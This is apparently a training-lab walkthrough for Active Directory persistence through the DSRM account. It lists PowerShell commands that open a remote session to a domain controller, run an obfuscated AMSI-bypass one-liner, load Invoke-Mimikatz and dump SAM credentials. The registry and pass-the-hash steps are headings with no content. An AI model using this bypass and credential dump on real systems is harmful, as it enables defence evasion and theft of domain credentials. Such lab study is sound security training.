Obj 11 DSRM
Task - Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.
Start a new session on the DC
PS C:\AD\Tools\Tools> $sess = New-PSSession dcorp-dc.dollarcorp.moneycorp.local
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sessDisable AMSI on the DC
[dcorp-dc.dollarcorp.moneycorp.local]:PS C:\Users\svcadmin\Documents> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )Back on the host machine Load Mimikatz into memory on the $sess
PS C:\AD\Tools\Tools> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sessEnter back into the PSSession on the DC
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sessDump the creds of the DC with Mimikatz
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'Modify the registry on the DC
Pass the hash
Access the DC
Last updated